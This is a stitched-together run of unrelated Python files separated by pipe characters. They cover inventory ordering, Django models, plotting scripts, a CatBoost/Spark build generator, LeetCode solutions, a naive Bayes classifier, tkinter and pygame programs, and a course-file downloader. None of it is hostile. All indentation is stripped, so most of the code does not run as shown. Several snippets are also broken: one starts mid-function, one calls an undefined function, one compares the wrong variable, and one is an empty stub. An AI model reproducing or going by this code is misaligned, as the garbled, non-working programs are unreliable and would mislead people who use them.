need_order_num = i.store_max - i.store_num - (pre_order_num - pre_purchased_num)
if need_order_num > 0:
order = db.session.query(Order).filter_by(part_id=i.part_id, order_status=0).first()
if order != None:
# 如果已经产生未写入的订货报表,则更新订货数量
order.order_num = need_order_num
time_str = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
curr_time = datetime.datetime.strptime(time_str, '%Y-%m-%d %H:%M:%S')
order.order_time = curr_time
db.session.commit()
else:
# 否则,就创建新的订货信息
order_new = Order(order_num=need_order_num, purchased_num=0, part_id=i.part_id,
order_status=0)
order_new.save()
else:
# 如果数量没有少于库存临界值,则查看订单中有无未写入订货报表的订货信息,若有则删除订单
ordering = db.session.query(Order).filter_by(part_id=i.part_id, order_status=0).first()
if ordering != None:
db.session.delete(ordering)
db.session.commit()
print('库存清单已经更新,已经生成对应的订货信息')
|
# Exercise 2: Figure out which line of the above program is still not
# properly guarded. See if you can construct a text file which causes the
# program to fail and then modify the program so that the line is properly
# guarded and test it to make sure it handles your new text file.
# Exercise 3: Rewrite the guardian code in the above example without
# two if statements. Instead, use a compound logical expression using
# the or logical operator with a single if statement.
try:
fhand = open('mbox-short.txt')
except:
print("The file doesn't exist")
exit()
count = 0
for line in fhand:
words = line.split()
# print('Debug:', words)
if len(words) == 0 or words[0] != 'From' : continue
print(words[2])
|
from django.db import models
from main.models import User, Product
from enum import Enum
# Create your models here.
class Status(Enum):
PROCCESING = 'В обработке'
SHIPMENT = 'Отправлен'
CLOSED = 'Закрыт'
def __str__(self):
return self.value
class Order(models.Model):
client = models.ForeignKey(User,on_delete=models.SET_NULL, null=True, blank=True)
first_name = models.CharField(verbose_name='Имя', max_length=50, null=True)
last_name = models.CharField(verbose_name='Фамилия', max_length=50, null=True)
email = models.EmailField(verbose_name='Email', null=True)
address = models.CharField(verbose_name='Адрес', max_length=250, null=True)
postal_code = models.CharField(verbose_name='Почтовый код', max_length=20, null=True)
city = models.CharField(verbose_name='Город', max_length=100)
created = models.DateTimeField(verbose_name='Создан', auto_now_add=True, null=True)
updated = models.DateTimeField(verbose_name='Обновлен', auto_now=True, null=True)
status = models.CharField(max_length=20, choices=[(status.value, status.name) for status in Status], default=Status.PROCCESING.value)
paid = models.BooleanField(verbose_name='Оплачен', default=False, null=True)
def get_total_cost(self):
return sum(item.get_cost() for item in TempProduct.objects.filter(order=self))
def __str__(self):
return 'Заказ: {}'.format(self.id)
class TempProduct(models.Model):
order = models.ForeignKey(Order, on_delete=models.CASCADE, blank=True, null=True)
product = models.ForeignKey(Product, on_delete=models.CASCADE, blank=True, null=True)
quantity = models.PositiveIntegerField(verbose_name="Количество", default=1)
price = models.PositiveIntegerField(verbose_name="Цена", null=True)
def __str__(self):
return '{}'.format(self.id)
def get_cost(self):
return self.price * self.quantity
|
from scipy.interpolate import UnivariateSpline
import numpy as np
from matplotlib import pyplot as plt
from matplotlib import style
x = np.linspace(-3,3,50)
y = np.exp(-x**2)+0.1*np.random.randn(50)
plt.plot(x,y,'ro',ms=5)
spl = UnivariateSpline(x,y)
xs = np.linspace(-3,3,1000)
#plt.plot(xs,spl(xs),'g',lw=4)
spl.set_smoothing_factor(0.5)
plt.plot(xs,spl(xs),'b',lw=3)
plt.show()
|
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import scipy.stats as st
import seaborn as sns
Traverse_data = pd.read_csv(f'Benchmark/csv/traverse_0_{1}.csv', sep='\t', index_col=0)
Traverse_data['run number'] = f'traverse_0_{1}'
for n in range(2,6):
df = pd.read_csv(f'Benchmark/csv/traverse_0_{n}.csv', sep='\t', index_col=0)
df['run number'] = f'traverse_0_{n}'
Traverse_data = pd.concat([Traverse_data, df])
#%%
sns.set(rc={'figure.figsize':(15,10)})
plot = sns.lineplot(data=Traverse_data, x='Nodes Number', y='Run Time (s)', hue='run number', style = 'user')
plot.figure.savefig("Benchmark/csv/graficone.jpg", dpi = 1000, bbox_inches='tight')
|
#!/usr/bin/env python
import os
import string
def generate_project(src_dir, substitution_dict, dst_dir):
for path in ('pom.xml', 'macros/pom.xml', 'core/pom.xml'):
with open(os.path.join(src_dir, path)) as src_file:
src = src_file.read()
dst = string.Template(src).safe_substitute(substitution_dict)
dst_path = os.path.join(dst_dir, path)
dst_path_dir = os.path.dirname(dst_path)
if not os.path.exists(dst_path_dir):
os.makedirs(dst_path_dir)
with open(dst_path, 'w') as dst_file:
dst_file.write(dst)
global_substitition_dict = {
'catboost_version_placeholder': '1.2.1',
'relative_global_project_root_placeholder': '../..'
}
scala_maven_plugin_configuration_scala_pre_2_13 = """
<compilerPlugins>
<compilerPlugin>
<groupId>org.scalamacros</groupId>
<artifactId>paradise_${scala.version}</artifactId>
<version>2.1.1</version>
</compilerPlugin>
</compilerPlugins>
"""
scala_maven_plugin_configuration_scala_2_13 = """
<args>
<arg>-Ymacro-annotations</arg>
</args>
"""
configs = [
{
'dst_dir' : '../projects/spark_2.3_2.11',
'substitution_dict' : {
'version_specific_src_dir': 'spark_2_x/scala',
'scala_compat_version_placeholder': '2.11',
'scala_version_placeholder': '2.11.12',
'spark_compat_version_placeholder': '2.3',
'spark_version_placeholder': '2.3.0',
'hadoop_version_placeholder': '2.7.3',
'json4s_version_placeholder': '3.2.11',
'netty_all_version_placeholer': '4.1.42.Final',
'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
}
},
{
'dst_dir' : '../projects/spark_2.4_2.11',
'substitution_dict' : {
'version_specific_src_dir': 'spark_2_x/scala',
'scala_compat_version_placeholder': '2.11',
'scala_version_placeholder': '2.11.12',
'spark_compat_version_placeholder': '2.4',
'spark_version_placeholder': '2.4.0',
'hadoop_version_placeholder': '2.7.3',
'json4s_version_placeholder': '3.5.3',
'netty_all_version_placeholer': '4.1.72.Final',
'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
}
},
{
'dst_dir' : '../projects/spark_2.4_2.12',
'substitution_dict' : {
'version_specific_src_dir': 'spark_2_x/scala',
'scala_compat_version_placeholder': '2.12',
'scala_version_placeholder': '2.12.12',
'spark_compat_version_placeholder': '2.4',
'spark_version_placeholder': '2.4.1',
'hadoop_version_placeholder': '2.7.3',
'json4s_version_placeholder': '3.5.3',
'netty_all_version_placeholer': '4.1.72.Final',
'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
}
},
{
'dst_dir' : '../projects/spark_3.0_2.12',
'substitution_dict' : {
'version_specific_src_dir': 'spark_3_x/scala',
'scala_compat_version_placeholder': '2.12',
'scala_version_placeholder': '2.12.12',
'spark_compat_version_placeholder': '3.0',
'spark_version_placeholder': '3.0.1',
'hadoop_version_placeholder': '2.7.3',
'json4s_version_placeholder': '3.6.6',
'netty_all_version_placeholer': '4.1.72.Final',
'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
}
},
{
'dst_dir' : '../projects/spark_3.1_2.12',
'substitution_dict' : {
'version_specific_src_dir': 'spark_3_x/scala',
'scala_compat_version_placeholder': '2.12',
'scala_version_placeholder': '2.12.12',
'spark_compat_version_placeholder': '3.1',
'spark_version_placeholder': '3.1.0',
'hadoop_version_placeholder': '3.2.0',
'json4s_version_placeholder': '3.7.0-M5',
'netty_all_version_placeholer': '4.1.72.Final',
'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
}
},
{
'dst_dir' : '../projects/spark_3.2_2.12',
'substitution_dict' : {
'version_specific_src_dir': 'spark_3_x/scala',
'scala_compat_version_placeholder': '2.12',
'scala_version_placeholder': '2.12.12',
'spark_compat_version_placeholder': '3.2',
'spark_version_placeholder': '3.2.0',
'hadoop_version_placeholder': '3.3.1',
'json4s_version_placeholder': '3.7.0-M11',
'netty_all_version_placeholer': '4.1.72.Final',
'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
}
},
{
'dst_dir' : '../projects/spark_3.2_2.13',
'substitution_dict' : {
'version_specific_src_dir': 'spark_3_x/scala',
'scala_compat_version_placeholder': '2.13',
'scala_version_placeholder': '2.13.5',
'spark_compat_version_placeholder': '3.2',
'spark_version_placeholder': '3.2.0',
'hadoop_version_placeholder': '3.3.1',
'json4s_version_placeholder': '3.7.0-M11',
'netty_all_version_placeholer': '4.1.72.Final',
'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_2_13
}
},
{
'dst_dir' : '../projects/spark_3.3_2.12',
'substitution_dict' : {
'version_specific_src_dir': 'spark_3_x/scala',
'scala_compat_version_placeholder': '2.12',
'scala_version_placeholder': '2.12.12',
'spark_compat_version_placeholder': '3.3',
'spark_version_placeholder': '3.3.0',
'hadoop_version_placeholder': '3.3.2',
'json4s_version_placeholder': '3.7.0-M11',
'netty_all_version_placeholer': '4.1.74.Final',
'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
}
},
{
'dst_dir' : '../projects/spark_3.3_2.13',
'substitution_dict' : {
'version_specific_src_dir': 'spark_3_x/scala',
'scala_compat_version_placeholder': '2.13',
'scala_version_placeholder': '2.13.5',
'spark_compat_version_placeholder': '3.3',
'spark_version_placeholder': '3.3.0',
'hadoop_version_placeholder': '3.3.2',
'json4s_version_placeholder': '3.7.0-M11',
'netty_all_version_placeholer': '4.1.74.Final',
'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_2_13
}
},
{
'dst_dir' : '../projects/spark_3.4_2.12',
'substitution_dict' : {
'version_specific_src_dir': 'spark_3_x/scala',
'scala_compat_version_placeholder': '2.12',
'scala_version_placeholder': '2.12.12',
'spark_compat_version_placeholder': '3.4',
'spark_version_placeholder': '3.4.0',
'hadoop_version_placeholder': '3.3.4',
'json4s_version_placeholder': '3.7.0-M11',
'netty_all_version_placeholer': '4.1.87.Final',
'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
}
},
{
'dst_dir' : '../projects/spark_3.4_2.13',
'substitution_dict' : {
'version_specific_src_dir': 'spark_3_x/scala',
'scala_compat_version_placeholder': '2.13',
'scala_version_placeholder': '2.13.5',
'spark_compat_version_placeholder': '3.4',
'spark_version_placeholder': '3.4.0',
'hadoop_version_placeholder': '3.3.4',
'json4s_version_placeholder': '3.7.0-M11',
'netty_all_version_placeholer': '4.1.87.Final',
'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_2_13
}
}
]
current_dir = os.path.dirname(os.path.realpath(__file__))
for config in configs:
substitution_dict = global_substitition_dict.copy()
substitution_dict.update(config['substitution_dict'])
generate_project(
src_dir=current_dir,
substitution_dict=substitution_dict,
dst_dir=os.path.join(current_dir, config['dst_dir'])
)
|
from ROOT import *
import sys
import os
import re
#TODO: Might need to create this file
gROOT.Macro("rootLogon.C")
quantity = sys.argv[1]
print("\nlooking at " + quantity + " in Signal\n\n")
for bkgFile in os.listdir("smallified_bkg"):
print("\n\nRunning on "+bkgFile+"\n\n")
bkg = re.search(r'(.*)smallified_(.*).root',bkgFile).groups()[1]
title = quantity + " of " + bkg
can = TCanvas(title,title)
f = TFile("smallified_bkg/"+bkgFile)
tree = f.Get("ntuplizer/tree")
tree.Draw(quantity)
can.Print("%s_%s.png" % (bkg, quantity),'png')
print("\ndone!\n")
|
#!/usr/bin/env python3
"""
Takes a string as input and outputs the reverse
"""
def reverse_str(string_arg):
new_string = list(string_arg)
new_string.reverse()
new_string = "".join(new_string)
return new_string
print(reverse_str("strings are the best"))
|
# -*- coding: utf-8 -*-
# @Author: WuLC
# @Date: 2017-05-21 15:20:45
# @Last modified by: WuLC
# @Last Modified time: 2017-05-21 15:23:10
# @Email: liangchaowu5@gmail.com
# judge if there are only two kinds of length between points firstly
# then find the neighbors of p1 with the shortest length and judge if the neighboring edge are orthogonal
from math import sqrt
class Solution(object):
def validSquare(self, p1, p2, p3, p4):
def distance(a, b):
return (a[0]-b[0])**2+(a[1]-b[1])**2
record = set()
points = [p1, p2, p3, p4]
for i in xrange(4):
for j in xrange(i+1, 4):
record.add(distance(points[i], points[j]))
if len(record) != 2:
return False
edge = min(record)
p1_neighbors = []
for p in points:
if distance(p, p1) == edge:
p1_neighbors.append(p)
p1_vectors = map(lambda p: (p[0]-p1[0], p[1]-p1[1]), p1_neighbors)
if len(p1_vectors) != 2: # case [0,0], [1,1], [0,0], [0,0]
return False
else:
return True if reduce(lambda p,q : p[0]*q[0]+p[1]*q[1], p1_vectors) == 0 else False
|
#coding:utf-8
'''
函数localWords()与程序清单中的spamTest()函数几乎相同,区别在于这里访问的是
RSS源而不是文件。然后调用函数calcMostFreq()来获得排序最高的30个单词并随后将它们移除
'''
import random
import feedparser
from numpy import array
import bayes
def localWords(feed1,feed0):
import feedparser
docList=[]; classList = []; fullText =[]
minLen = min(len(feed1['entries']),len(feed0['entries']))
print feed1['entries']
print feed0['entries']
for i in range(minLen):
wordList = bayes.textParse(feed1['entries'][i]['summary'])
docList.append(wordList)
fullText.extend(wordList)
classList.append(1) #NY is class 1
wordList = bayes.textParse(feed0['entries'][i]['summary'])
docList.append(wordList)
fullText.extend(wordList)
classList.append(0)
vocabList = bayes.createVocabList(docList)#create vocabulary
top30Words = calcMostFreq(vocabList,fullText) #remove top 30 words
for pairW in top30Words:
if pairW[0] in vocabList: vocabList.remove(pairW[0])
trainingSet = list(range(2*minLen)); testSet=[] #create test set
for i in range(10):
randIndex = int(random.uniform(0,len(trainingSet)))
testSet.append(trainingSet[randIndex])
del(trainingSet[randIndex])
trainMat=[]; trainClasses = []
for docIndex in trainingSet:#train the classifier (get probs) trainNB0
trainMat.append(bayes.bagOfWord2VecMN(vocabList, docList[docIndex]))
trainClasses.append(classList[docIndex])
p0V,p1V,pSpam = bayes.trainNB0(array(trainMat), array(trainClasses))
errorCount = 0
for docIndex in testSet: #classify the remaining items
wordVector = bayes.bagOfWord2VecMN(vocabList, docList[docIndex])
if bayes.classifyNB(array(wordVector), p0V, p1V, pSpam) != classList[docIndex]:
errorCount += 1
print('the error rate is: ',float(errorCount)/len(testSet))
return vocabList,p0V,p1V
def calcMostFreq(vocabList,fullText):
'''
返回前30个高频词
'''
import operator
freqDict = {}
for token in vocabList:
freqDict[token]=fullText.count(token)
sortedFreq = sorted(freqDict.items(), key=operator.itemgetter(1), reverse=True)
return sortedFreq[:30]
if __name__== "__main__":
#导入RSS数据源
import operator
ny=feedparser.parse('http://newyork.craigslist.org/stp/index.rss')
sf=feedparser.parse('http://sfbay.craigslist.org/stp/index.rss')
localWords(ny,sf) |
import tkinter as tk
import time
window = tk.Tk()
window.title('my window')
window.geometry('375x200')
var1 = tk.StringVar()
label = tk.Label(window,bg='yellow',width=4,textvariable=var1)
label.pack()
var2 = tk.StringVar()
var2.set([11,22,33,44])
listbox = tk.Listbox(window,listvariable=var2)
def print_selection():
value = listbox.get(listbox.curselection())
var1.set(value)
btn1 = tk.Button(window,text='print selection',width=15,height=2,command=print_selection)
btn1.pack()
list_items=[1,2,3,4]
for item in list_items:
listbox.insert('end',item)
listbox.insert(1,'first')
listbox.insert(2,'second')
listbox.pack()
listbox.delete(2)
window.mainloop() |
"""
977. Squares of a Sorted Array
"""
class Solution:
def sortedSquares(self, A: List[int]) -> List[int]:
sq_arr = []
for i in A:
sq_arr.append(i*i)
sq_arr.sort()
return sq_arr |
import pickle
import numpy as np
import os, csv, argparse
import concurrent.futures
FASHION_DIR = "/cvgl/u/anenberg/Fashion144k_stylenet_v1"
SIMILAR_PAIR_DIR = "/cvgl/u/anenberg/Fashion144k_stylenet_v1/similar_pairs"
step_size = 1
similar_thresh = 0.75
def r_metric(i,j,labels):
"""
Intersection over union of the labels.
"""
return 1.0*sum(labels[i] & labels[j]) / sum(labels[i] | labels[j])
def find_sim_dis_ims(anchor, labels, ts=0.75, td=0.1, max_it = 100):
similar = None
dissimilar = None
sample_idxs = np.random.choice(np.arange(labels.shape[0]), max_it, replace=False)
for idx in sample_idxs:
if dissimilar is not None and similar is not None:
break
if idx == anchor:
continue
similarity = r_metric(anchor,idx,labels)
if similarity > ts and similar is None:
similar = idx
elif dissimilar < td and dissimilar is None:
dissimilar = idx
return (similar, dissimilar)
def triplet(labels, ts=0.75, td=0.1, max_tries=10, max_it=100):
for _ in range(max_tries):
anchor = np.random.randint(labels.shape[0])
similar, dissimilar = find_sim_dis_ims(anchor, labels, ts=ts, td=td, max_it=max_it)
if similar is not None and dissimilar is not None:
return (dissimilar, anchor, similar)
def find_similar(
labels,
ts,
idx):
pairs = {}
for j in range(idx+1,labels.shape[0]):
similarity = r_metric(idx,j,labels)
if similarity > ts:
pairs[(idx,j)] = similarity
if j % 10000 == 0:
print('running {0}...{1:.2f}'.format(idx,100.0*j/labels.shape[0]))
return pairs
def main():
color_mat = np.load(os.path.join(FASHION_DIR,'feat/feat_col.npy'))
single_mat = np.load(os.path.join(FASHION_DIR,'feat/feat_sin.npy'))
labels = np.hstack([color_mat, single_mat])
parser = argparse.ArgumentParser(description='Computes similarity between image pairs')
parser.add_argument('-s','--start', help='start index', type=int, default=0)
parser.add_argument('-e','--end', help='end index', type=int, default=labels.shape[0])
parser.add_argument('-t','--threads', help='number of threads',type=int, default=50)
args = parser.parse_args()
if not os.path.exists(SIMILAR_PAIR_DIR):
os.mkdir(SIMILAR_PAIR_DIR)
with concurrent.futures.ProcessPoolExecutor(max_workers=args.threads) as executor:
futures = {}
for start_idx in range(args.start,args.end):
futures[executor.submit(find_similar, labels, similar_thresh, start_idx)] = start_idx
for future in concurrent.futures.as_completed(futures):
start_idx = futures[future]
try:
pairs = future.result()
except Exception as exc:
print('%r generated an exception: %s' % (start_idx, exc))
else:
out_file = os.path.join(
SIMILAR_PAIR_DIR,
"{0}.pkl".format(start_idx))
with open(out_file, 'wb') as handle:
pickle.dump(pairs, handle)
print('saving {0}'.format(out_file))
if __name__ == "__main__":
main() |
# Generated by Django 2.0.1 on 2018-01-09 15:43
import defibs.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('defibs', '0002_auto_20180108_1407'),
]
operations = [
migrations.AddField(
model_name='defib',
name='image',
field=models.ImageField(blank=True, null=True, upload_to=defibs.models.RandomFileName('uploads/')),
),
]
|
import bitcoin
import pybitcointools
from reportlab.pdfgen import canvas
EmailReport = canvas.Canvas ("newest.pdf")
EmailReport.drawString(200,800, "YOUR BITCOIN TRANSACTION")
EmailReport.save()
history("1CucinVK34txDn6Lxp1VjTpzi2J8FLXxe7") |
#!/usr/bin/env python
# coding: utf-8
# In[1]:
def data_grab():
"""importing data function"""
import os
import pandas as pd
import pymysql
import csv
from sqlalchemy import create_engine, types
|
import random
import re
import discord
import jb2.command
import jb2.embed
class AskCommand(jb2.command.Command):
def __init__(self, connector):
with open('res/text/odpowiedzi.txt') as file:
self.answers = file.readlines()
def get_pattern(self):
return r'ask( .+)?$'
async def action(self, prefix, message, client):
msg = message.content.strip()
author_m = message.author.mention
pattern = self.get_full_pattern(prefix)
question = re.match("^" + pattern, msg).group(1)
if question is None:
text = "Potrzebny parametr: **question**"
emb = jb2.embed.error_embed(author_m, text)
else:
emoji = ":8ball:"
emb = jb2.embed.embed(emoji, author_m, random.choice(self.answers))
emb.colour = 0x007777
await client.send_message(message.channel, embed=emb)
|
"""
Bachelor's thesis: Generation of guitar tracks utilizing knowledge of song structure
Author: Adam Pankuch
"""
import sys
import glob
import os.path
import json
import gputils
if __name__ == '__main__':
try:
gpDirPath = sys.argv[1]
statsOutPath = sys.argv[2]
logOutPath = sys.argv[3]
except IndexError:
print('Use: python stats.py [gp-dir-path] [stats.json] [log.txt]')
sys.exit(1)
stats = {}
# iterate through all files and save statistics of songs with markers
cnt_all = 0
cnt_mark = 0
cnt_corrupt = 0
for filename in glob.iglob(gpDirPath + '**/*.gp*', recursive=True):
relativeFilename = filename[len(gpDirPath):]
if os.path.isfile(filename):
print(cnt_all, ' ', filename)
try:
songStat = gputils.getSongStatistics(filename)
if songStat is not None:
stats[relativeFilename] = songStat
cnt_mark += 1
except:
print('=== ERROR - corrupted file ===')
cnt_corrupt += 1
cnt_all += 1
with open(statsOutPath, 'w') as fout:
output = json.dumps(stats, indent=4)
fout.write(output)
log = 'all: ' + str(cnt_all) + '\n'
log += 'mark: ' + str(cnt_mark) + '\n'
log += 'corrupt: ' + str(cnt_corrupt) + '\n'
print(log)
with open(logOutPath, 'w') as fout:
fout.write(log)
|
import pygame
#import input_handler
from game_rooms import first_room, second_room, third_room
pygame.init()
screen = pygame.display.set_mode((1200, 600))
clock = pygame.time.Clock()
done = False
splash_screen_over = False
win_screen_over = False
font = pygame.font.SysFont(None, 48)
parser_font = pygame.font.SysFont(None, 72)
#bear_pelt = pygame.image.load("bearpelt16x16.bmp")
startup_splash = pygame.image.load("AsVdayAdventure.bmp")
you_win = pygame.image.load("you_win_yellow.bmp")
pygame.display.set_caption("*Amanda's Valentine's Day Adventure*")
text1_string = ""
text2_string = ""
text3_string = ""
text4_string = ""
text5_string = ""
text6_string = "Samsoft Presents:"
text7_string = "*Amanda's Valentine's Day Adventure*"
text8_string = ""
text9_string = "Type 'quit' or 'exit' to close the program."
text10_string = "Type 'look' to see a little description of where you are."
text11_string = ""
text12_string = ""
text13_string = "You walk in the front door of the house."
text14_string = "Instead of someone on their laptop on the couch, you instead see a bear."
input_string = ""
text_string_list = [text1_string, text2_string, text3_string, text4_string, text5_string, text6_string, text7_string, text8_string, text9_string, text10_string, text11_string, text12_string, text13_string, text14_string]
inventory = []
text1 = font.render(text1_string, True, (65, 0, 0))
text2 = font.render(text2_string, True, (65, 0, 0))
text3 = font.render(text3_string, True, (65, 0, 0))
text4 = font.render(text4_string, True, (90, 0, 0))
text5 = font.render(text5_string, True, (90, 0, 0))
text6 = font.render(text6_string, True, (125, 0, 0))
text7 = font.render(text7_string, True, (125, 0, 0))
text8 = font.render(text8_string, True, (125, 0, 0))
text9 = font.render(text9_string, True, (125, 0, 0))
text10 = font.render(text10_string, True, (125, 0, 0))
text11 = font.render(text11_string, True, (125, 0, 0))
text12 = font.render(text12_string, True, (125, 0, 0))
text13 = font.render(text13_string, True, (125, 0, 0))
text14 = font.render(text14_string, True, (125, 0, 0))
text15 = parser_font.render(f">{input_string}", True, (255, 0, 0))
def render_all_lines():
screen.blit(text1, (0, 0))
screen.blit(text2, (0, 35))
screen.blit(text3, (0, 70))
screen.blit(text4, (0, 105))
screen.blit(text5, (0, 140))
screen.blit(text6, (0, 175))
screen.blit(text7, (0, 210))
screen.blit(text8, (0, 245))
screen.blit(text9, (0, 280))
screen.blit(text10, (0, 315))
screen.blit(text11, (0, 350))
screen.blit(text12, (0, 385))
screen.blit(text13, (0, 420))
screen.blit(text14, (0, 455))
screen.blit(text15, (0, 510))
#def render_inventory(inventory):
#if "bear pelt" in inventory:
# screen.blit(bear_pelt, (1100, 25))
# follow up with rest of inventory here
# Start screen code below
while not splash_screen_over:
for event in pygame.event.get():
screen.fill((255, 255, 255))
#splash_text = font.render("Welcome to your adventure!", True, (0, 0, 0))
screen.blit(startup_splash, (60, 50))
press_enter_text = font.render("Press enter to start.", True, (0, 0, 0))
if event.type == pygame.KEYDOWN and event.key == pygame.K_RETURN:
splash_screen_over = True
#screen.blit(splash_text, (0,225))
screen.blit(press_enter_text, (450, 550))
pygame.display.update()
while not done:
for event in pygame.event.get():
if event.type == pygame.KEYDOWN and event.type == pygame.QUIT:
done = True
elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
done = True
elif event.type == pygame.KEYDOWN and event.key == pygame.K_BACKSPACE:
input_string = input_string[:-1]
text15 = parser_font.render(f">{input_string}", True, (255, 0, 0))
elif event.type == pygame.KEYDOWN:
if event.unicode.isalnum() == True or event.key == pygame.K_SPACE:
input_string = input_string + event.unicode
text15 = parser_font.render(f">{input_string}", True, (255, 0, 0))
screen.blit(text15, (0, 510))
pygame.display.update()
if event.type == pygame.KEYDOWN and event.key == pygame.K_RETURN:
if "quit" in input_string or "exit" in input_string:
done = True
break
# MAIN GAME ROOM LOOP HERE
text_string_list.append(">" + input_string)
if "petit fours" in inventory and "flower" in inventory:
room_output = third_room(input_string)
for i in range(0, len(room_output)):
text_string_list.append(room_output[i])
if "You win the game!" in room_output:
inventory.append("cricut stuff")
elif "petit fours" in inventory:
room_output = second_room(input_string)
for i in range(0, len(room_output)):
text_string_list.append(room_output[i])
if "It is on top of some thick, colorful card stock." in room_output:
inventory.append("flower")
else:
room_output = first_room(input_string)
if "The door to the pantry is ajar." in room_output:
inventory.append("petit fours")
for i in range(0, len(room_output)):
text_string_list.append(room_output[i])
text1_string = text_string_list[-14]
text2_string = text_string_list[-13]
text3_string = text_string_list[-12]
text4_string = text_string_list[-11]
text5_string = text_string_list[-10]
text6_string = text_string_list[-9]
text7_string = text_string_list[-8]
text8_string = text_string_list[-7]
text9_string = text_string_list[-6]
text10_string = text_string_list[-5]
text11_string = text_string_list[-4]
text12_string = text_string_list[-3]
text13_string = text_string_list[-2]
text14_string = text_string_list[-1]
input_string = ""
text1 = font.render(text1_string, True, (65, 0, 0))
text2 = font.render(text2_string, True, (65, 0, 0))
text3 = font.render(text3_string, True, (65, 0, 0))
text4 = font.render(text4_string, True, (90, 0, 0))
text5 = font.render(text5_string, True, (90, 0, 0))
text6 = font.render(text6_string, True, (90, 0, 0))
text7 = font.render(text7_string, True, (90, 0, 0))
text8 = font.render(text8_string, True, (125, 0, 0))
text9 = font.render(text9_string, True, (125, 0, 0))
text10 = font.render(text10_string, True, (125, 0, 0))
text11 = font.render(text11_string, True, (125, 0, 0))
text12 = font.render(text12_string, True, (125, 0, 0))
text13 = font.render(text13_string, True, (125, 0, 0))
text14 = font.render(text14_string, True, (125, 0, 0))
text15 = parser_font.render(f">{input_string}", True, (255, 0, 0))
#elif event.type == pygame.K_END:
#cursor_position = len(input_string)
#elif event.type == pygame.K_HOME:
#cursor_position = 0
screen.fill((0, 0, 0))
render_all_lines()
#render_inventory(inventory)
pygame.display.update()
clock.tick(30)
# win screen
if "petit fours" in inventory and "flower" in inventory and "cricut stuff" in inventory:
pygame.time.wait(5000)
while not win_screen_over:
for event in pygame.event.get():
screen.fill((255, 255, 255))
#winscreen_text = font.render("You have won your adventure!", True, (0, 0, 0))
win_enter_text = font.render("Press enter to close the program.", True, (0, 0, 0))
if event.type == pygame.KEYDOWN and event.key == pygame.K_RETURN:
win_screen_over = True
done = True
break
screen.blit(you_win, (284, 0))
#screen.blit(winscreen_text, (0, 225))
screen.blit(win_enter_text, (350, 565))
pygame.display.update()
|
from django.db import models
import datetime as dt
from django.contrib.auth.models import User
from tinymce.models import HTMLField
class tags(models.Model):
name=models.CharField(max_length=30)
def __str__(self):
return self.name
class Article(models.Model):
title=models.CharField(max_length=60)
post=HTMLField()
editor=models.ForeignKey(User, on_delete=models.CASCADE)
tags=models.ManyToManyField(tags)
pub_date=models.DateTimeField(auto_now_add=True)
article_image = models.ImageField(upload_to = 'articles/', blank=True)
@classmethod
def todays_news(cls):
today=dt.date.today()
news=cls.objects.filter(pub_date__date=today)
return news
@classmethod
def days_news(cls,date):
news=cls.objects.filter(pub_date__date=date)
return news
@classmethod
def search_by_title(cls, search_term):
news=cls.objects.filter(title__icontains=search_term)
return news
class NewsLetterRecipients(models.Model):
name = models.CharField(max_length = 30)
email = models.EmailField()
class MoringaMerch(models.Model):
name = models.CharField(max_length=40)
description = models.TextField()
price = models.DecimalField(decimal_places=2, max_digits=20) |
# python fenix_download login_file <url> -e <file_extension> (DEFAULT = pdf) -d <download_directory>
#
#
from fenix import Fenix
from exceptions import LoginFailedException
from bs4 import BeautifulSoup
import json, argparse, os, re
from urllib.request import urlretrieve
def parse_user(file_name):
"""
Parse user credentials from the json file
"""
with open(file_name, 'r') as f:
return json.load(f)["user"]
def get_download_path(dl_dir, file_url):
if not os.path.exists(dl_dir):
os.makedirs(dl_dir)
# get the last part of url as file_name
file_name = file_url.split("/")[-1]
return dl_dir + '/' + file_name
# TODO: this should be a method in Fenix API
def download_file(fenix, url, file):
with open(file, 'wb') as f:
f.write(fenix.open(url).read())
def main(url, login_file, file_ext, dl_dir):
user = parse_user(login_file) # get login credentials
fenix = Fenix(user["username"], user["password"]).login()
if fenix is None:
raise LoginFailedException('Could not log in, please make sure that the provided credentials ' +
'are correct.' )
# TODO: exception handling
html = fenix.open(url)
bsObj = BeautifulSoup(html, 'html.parser')
content_div = bsObj.find('div', {'class':'col-sm-9 main-content'})
# maybe trust internal links only? add an opt to argparse
anchors = content_div.findAll('a', {'href':re.compile('^(http)(.)*(.' + file_ext + ')$')})
for anchor in anchors:
dl_path = get_download_path(dl_dir, anchor['href'])
print('Downloading ' + dl_path + "...")
download_file(fenix, anchor['href'].replace(" ","+"), dl_path)
if __name__ == '__main__':
# TODO: argparse
parser = argparse.ArgumentParser(description='Download files from Fenix Edu pages')
parser.add_argument('url', type=str, help='url from where to download the files from')
parser.add_argument('-l', '--login', type=str, default="login.json" , help='path to fenix login credentials file (check login.json for format)')
parser.add_argument('-e', '--extension', type=str, default='pdf', help='file extensions to download, without the leading "." (* for all, default is "pdf")')
parser.add_argument('-d', '--directory', type=str, default='download', help='download directory')
args = parser.parse_args()
main(args.url, args.login, args.extension, args.directory) |
# -*- coding: utf-8 -*-
from django.contrib import admin
from loggers.models import DebugData
class LoggersAdmin(admin.ModelAdmin):
list_display = ('msg_level', 'msg', 'full_debug',)
list_filter = ('msg_level',)
search_fields = ['full_debug']
admin.site.register(DebugData, LoggersAdmin)
|
###########################################
# Let's Have Some Fun
# File Name: 141.py
# Author: Weilin Liu
# Mail: liuweilin17@qq.com
# Created Time: Fri Nov 16 21:19:10 2018
###########################################
#coding=utf-8
#!/usr/bin/python
# 141. Linked List Cycle
from basics.LinkedList import *
